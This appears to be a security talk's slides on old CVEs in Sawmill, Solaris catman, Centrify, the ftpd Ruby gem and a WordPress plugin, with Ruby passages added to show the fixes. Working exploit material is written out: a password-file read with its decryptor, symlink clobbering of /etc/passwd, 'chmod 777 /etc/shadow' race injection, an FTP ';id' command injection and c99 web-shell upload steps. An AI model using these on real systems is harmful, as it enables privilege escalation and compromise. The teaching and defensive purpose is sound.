This document discusses various software exploits, both old and new. It begins with background on the author and terminology used. Several specific past exploits are described in detail, including vulnerabilities in IRIX Midikeys from 1999, Sawmill from 2000, and Solaris catman from 2000. Exploit code examples are provided. More recent exploits discussed include a race condition in Centrify from 2012, command injection in an FTP server from 2013, SQL injection in WordPress software from 2015, and remote file inclusion in another WordPress plugin from 2015. The document concludes by soliciting any questions.
Fun with Exploits Old and New: Software Behavior and Exploitation
1. Fun with Exploits Old and New
How software is expected to behave, how it really behaves and how we can exploit it
Larry W. Cashdollar
11/13/2015
V1.9
2. Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 100+ Vulnerabilities discovered
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code
• This is my second time speaking in public
3. Terminology
• CVE – Common Vulnerabilities and Exposures
• Root shell – gaining access to administrative
user on Unix system
• Web shell – a web based shell used to access
the system via HTTP
• Vulnerability – A flaw in a piece of software
• PoC – Proof of Concept
4. What is this all about?
• Concepts
• Methodologies
• Mind set
• How can I break this?
• Think like a hacker
5. Why bother hacking stuff?
• Improves software security
• Improves stability
• It’s like solving a puzzle
• Can be a lot of fun
• Improves your skills
• And……..
13. Sawmill LFI & weak encryption CVE-2000-0589 & 0588
• Log analysis server listens on port 8987
• LFI can read first line of any world readable file
• Admin password stored in local file
• Admin password encrypted with custom
algorithm
14. Exploiting CVE-2000-0589 & 0588
• $ curl 'http://192.168.1.65:8987/sawmill?rfcf+%22/etc/sawmill/adminpwd.db%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3'
• Returns encrypted password Am@duZw
• Simple substitution cypher
• Wrote code to decrypt… for my palm pilot IIIxe
16. PoC for CVE-2000-0589 & 0588
#include <stdio.h>
#include <string.h>

/* Plaintext alphabet and the cipher alphabet it maps onto, position by
 * position (both are 55 characters). The double quote inside each string
 * has to be escaped in C source. */
char alpha[] = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|";
char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

int
main (int argc, char **argv)
{
  int x, y;
  char cypher[128];

  if (argc != 2) {
    fprintf (stderr, "usage: %s <encrypted password>\n", argv[0]);
    return 1;
  }
  strncpy (cypher, argv[1], sizeof cypher - 1);
  cypher[sizeof cypher - 1] = '\0';

  /* For each ciphertext character, find its position in the cipher
   * alphabet and print the plaintext character at the same position. */
  for (x = 0; x < strlen (cypher); x++) {
    for (y = 0; y < strlen (encode); y++)
      if (cypher[x] == encode[y]) {
        printf ("%c", alpha[y]);
        break;
      }
  }

  printf ("\n\" could also be a space [ ]\n");
  return 0;
}
• Decrypted password was ‘wookie’
• Access to modify administrative control panel
• Developer gave me a free license
17. Solaris catman file clobbering vulnerability CVE-2000-0095
• Creates files in /tmp insecurely
• Uses guessable filenames
• Doesn’t check to see if file already exists
• Creates files in /tmp as /tmp/sman_PID
• We can guess next filename and symlink to
/etc/passwd
18. PoC
#!/usr/local/bin/perl -w
# http://vapid.dhs.org
# File to clobber: catman (running as root) will overwrite whatever our
# symlink points at.
$clobber = "/etc/passwd";
# Starting guess: our process group id is close to the next pid the system
# will hand out, and catman names its file /tmp/sman_PID.
$X = getpgrp();
$Xc = $X;
# Constant: spray symlinks covering the next 1000 pids.
$Y = $X + 1000;
while ($X < $Y) {
    print "Linking /tmp/sman_$X to $clobber :";
    # Change $clobber to what you want to clobber.
    if (symlink($clobber, "/tmp/sman_$X")) {
        print "Success\n";
    } else {
        print "failed, Busy system?\n";
    }
    $X = $X + 1;
}
# Watch /tmp and see if catman is executed in time.
while (1) {
    $list = "/usr/bin/ls -l /tmp | grep sman | grep root |";
    open(list, $list) or die "can't open ls...\n";
    while (<list>) {
        @args = split "_", $_;
        chop($args[1]);
        if ($args[1] >= $Xc && $args[1] <= $Y) {
            print "Looks like pid $args[1] is the winner\ncleaning....\n";
            `/usr/bin/rm -f /tmp/sman*`;
            exit(1);
        }
    }
    close(list);
}
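The catman bug is the classic predictable-name-plus-open(2)-without-O_EXCL pattern. The following is an added example (not the author's PoC, and not catman's code) that reproduces the symlink clobber in a private scratch directory and shows the two fixes: opening with O_CREAT|O_EXCL, which POSIX requires to fail with EEXIST when the path already exists even as a symlink, and using an unpredictable name via Tempfile. The `sman_` prefix, the pid 4242 and the fake passwd contents are constructed for the demonstration.

```ruby
require "tmpdir"
require "tempfile"

# Vulnerable pattern (what catman did): open a predictable /tmp name for
# writing. "w" means O_CREAT|O_TRUNC without O_EXCL, so an attacker-planted
# symlink is followed and the target is truncated and overwritten.
def unsafe_create(dir, pid, contents)
  path = File.join(dir, "sman_#{pid}")
  File.open(path, "w") { |f| f.write(contents) }
  path
end

# Fix 1: O_CREAT|O_EXCL. If anything (file, symlink, dangling symlink) already
# sits at that path, open fails with EEXIST and the link is never followed.
# Returns nil when the race was lost instead of clobbering.
def safe_create(dir, pid, contents)
  path = File.join(dir, "sman_#{pid}")
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600) do |f|
    f.write(contents)
  end
  path
rescue Errno::EEXIST
  nil
end

# Fix 2: unpredictable name *and* O_EXCL, which is what Tempfile.create does.
# The attacker cannot pre-plant a symlink for a name they cannot guess.
def best_create(dir, contents)
  f = Tempfile.create("sman_", dir)
  f.write(contents)
  f.path
ensure
  f&.close
end

# Reproduce the attack from the Perl script above in a scratch directory:
# the "attacker" plants the symlink first, then the "victim" creates its file.
# Returns true if the victim's write went through the symlink.
def clobbered_by?(creator)
  Dir.mktmpdir do |dir|
    victim = File.join(dir, "passwd")            # stands in for /etc/passwd
    original = "root:x:0:0::/:/bin/sh\n"         # constructed sample content
    File.write(victim, original)
    pid = 4242                                   # the pid we "guessed"
    File.symlink(victim, File.join(dir, "sman_#{pid}"))
    creator.call(dir, pid, "evil::0:0::/:/bin/sh\n")
    File.read(victim) != original
  end
end

# Shows the random name Tempfile chooses for the safe variant.
def unpredictable_name
  Dir.mktmpdir { |dir| File.basename(best_create(dir, "data")) }
end

if __FILE__ == $0
  puts "open(\"w\") clobbered target: #{clobbered_by?(method(:unsafe_create))}"
  puts "O_EXCL clobbered target:    #{clobbered_by?(method(:safe_create))}"
  puts "Tempfile name:              #{unpredictable_name}"
end
```

The O_EXCL variant alone still leaks which pids the program is about to use, and on a busy system a lost race means the program has to retry, which is why a random name from mkstemp(3)/Tempfile is the usual fix rather than O_EXCL on a guessable name.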
21. Centrify CVE-2012-6348 /tmp race condition local root
• Administrative control daemon for system
management
• Creates a file in /tmp as centrify.cmd.0
• Executes that file as shell script!
• Executes as root!
22. CVE-2012-6348 PoC
Wins race condition 50% of the time:
$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0;
done
After the system is refreshed via administrative control job:
$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
23. CVE-2012-6348 Better PoC
• Wins race condition 100% of the time
• Written in C
• Uses the inotify API to detect file creation and modification
• Too long to display here
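The Centrify bug is the consumer-side twin of catman: a root daemon reads and executes a file out of a world-writable directory that anyone could have created or appended to. The added example below (not Centrify's code) shows the minimum check such a daemon should do before executing a script: lstat to refuse symlinks, open, then fstat on the open descriptor and compare dev/ino so the object that was checked is the object that is read, then require the expected owner and no group/other write bits. The `trusted_uid` parameter and the file names are assumptions for the demonstration.

```ruby
require "tmpdir"

# Decide whether a script file may be executed by a privileged process.
# Checks happen on the open descriptor, not the path, so an attacker cannot
# swap the file between the check and the read (the classic TOCTOU window).
def trusted_script?(path, trusted_uid: 0)
  st = File.lstat(path)                        # lstat: does not follow symlinks
  return false if st.symlink? || !st.file?     # must be a plain regular file
  File.open(path, File::RDONLY) do |f|
    fst = f.stat                               # fstat on the open descriptor
    return false unless fst.dev == st.dev && fst.ino == st.ino  # same object we lstat'ed
    return false unless fst.uid == trusted_uid                  # owned by the daemon's user
    return false if (fst.mode & 0o022) != 0                     # no group/other write bit
    return false unless fst.nlink == 1                          # no hard links elsewhere
    true
  end
rescue Errno::ENOENT, Errno::EACCES
  false
end

# Constructed scenario in a scratch directory: a properly owned 0644 script,
# a world-writable one like centrify.cmd.0 became, a symlink, and a missing file.
def demo_results
  Dir.mktmpdir do |dir|
    me = Process.uid
    good = File.join(dir, "centrify.cmd.0")
    File.write(good, "#!/bin/sh\necho ok\n")
    File.chmod(0o644, good)
    loose = File.join(dir, "centrify.cmd.1")
    File.write(loose, "chmod 777 /etc/shadow\n")   # the payload from the PoC
    File.chmod(0o666, loose)
    link = File.join(dir, "centrify.cmd.2")
    File.symlink(good, link)
    {
      owned_0644:     trusted_script?(good,  trusted_uid: me),
      world_writable: trusted_script?(loose, trusted_uid: me),
      symlink:        trusted_script?(link,  trusted_uid: me),
      missing:        trusted_script?(File.join(dir, "centrify.cmd.9"), trusted_uid: me),
    }
  end
end

puts demo_results if __FILE__ == $0
```

This check is defence in depth only. The real fix is to stop using /tmp for privileged work at all and keep job files in a root-owned directory with mode 0700 (e.g. under /var/run), because in a world-writable sticky directory the attacker can still create the name before the daemon does.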
24. Ftpd ruby gem command injection CVE-2013-2512
• FTP server developed in ruby
• Code examination reveals remote command injection
def ls(ftp_path, option)
  path = expand_ftp_path(ftp_path)
  dirname = File.dirname(path)
  filename = File.basename(path)
  command = [
    'ls',
    option,
    filename,        # <-- unsanitized user controlled input
    '2>&1',
  ].compact.join(' ')
  if File.exists?(dirname)    # <-- directory has to exist for ls to be run
    list = Dir.chdir(dirname) do
      `#{command}`            # <-- passed to the shell here
    end
    # ... rest of the method elided
  end
end
25. CVE-2013-2512 PoC
$ ftp localhost
Connected to localhost.
220 ftpd
Name (localhost:root): anonymous
331 Password required
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
* I already created the filename foobar by uploading a file
ftp> ls foobar;id
200 PORT command successful
150 Opening ASCII mode data connection
-rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
uid=0(root) gid=0(root) groups=0(root)
226 Transfer complete
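The root cause is that the filename is interpolated into a string that the backtick operator hands to /bin/sh, so `;`, `|` and `$(...)` in an FTP path become shell syntax. The added example below (reconstructed from the snippet above, not the gem's exact code) runs the vulnerable shape next to the hardened one: `Open3.capture2e` with an argv array never starts a shell, so the filename is one literal argument, and `--` stops a name beginning with `-` from being parsed as an option. The option allowlist and the `foobar` scratch file are assumptions for the demonstration.

```ruby
require "open3"
require "tmpdir"

# Vulnerable shape: user input joined into a command string. Because the
# string contains shell metacharacters, Ruby runs it via /bin/sh -c.
def vulnerable_ls(dirname, filename, option = nil)
  return "" unless File.exist?(dirname)
  command = ["ls", option, filename, "2>&1"].compact.join(" ")
  Dir.chdir(dirname) { `#{command}` }
end

# Assumed allowlist of LIST options the server is willing to pass through.
LS_OPTIONS = %w[-l -a -la -al].freeze

# Hardened shape: argv form. With more than one argument Open3 execs "ls"
# directly; no shell ever sees the filename. stderr is merged like 2>&1 did.
def safe_ls(dirname, filename, option = nil)
  return "" unless File.exist?(dirname)
  option = nil unless LS_OPTIONS.include?(option)
  argv = ["ls", option, "--", filename].compact
  Dir.chdir(dirname) do
    out, _status = Open3.capture2e(*argv)
    out
  end
rescue Errno::ENOENT => e
  e.message
end

# Constructed scenario: a directory containing "foobar" (as in the PoC above)
# and a filename that smuggles a second command after a ';'. The payload
# prints INJECTED only if a shell interprets it.
def ftpd_demo
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, "foobar"), "")
    injected = "foobar; printf INJ%s ECTED"
    { vulnerable: vulnerable_ls(dir, injected), safe: safe_ls(dir, injected) }
  end
end

if __FILE__ == $0
  r = ftpd_demo
  puts "--- vulnerable ---", r[:vulnerable], "--- safe ---", r[:safe]
end
```

In the safe variant `ls` simply reports that no file named `foobar; printf INJ%s ECTED` exists; the injected command is never run. The same rule applies to `system`, `IO.popen` and `Kernel#spawn`: pass an array, never a string built from user data.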
28. wp-powerplaygallery vulnerable RFI code CVE-2015-5681
$targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_ uploadfolder';
$cleanupTargetDir = true; // Remove old files
$maxFileAge = 5 * 3600; // Temp file age in seconds

// Create target dir
if (!file_exists($targetDir)) {
    @mkdir($targetDir);
}
...
// Read binary input stream and append it to temp file
if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
}
...
while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
}
29. RFI Exploit Requirements
• POST request
• Variable albumid must point at existing album
in database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains payload with local full
path
• name variable contains our filename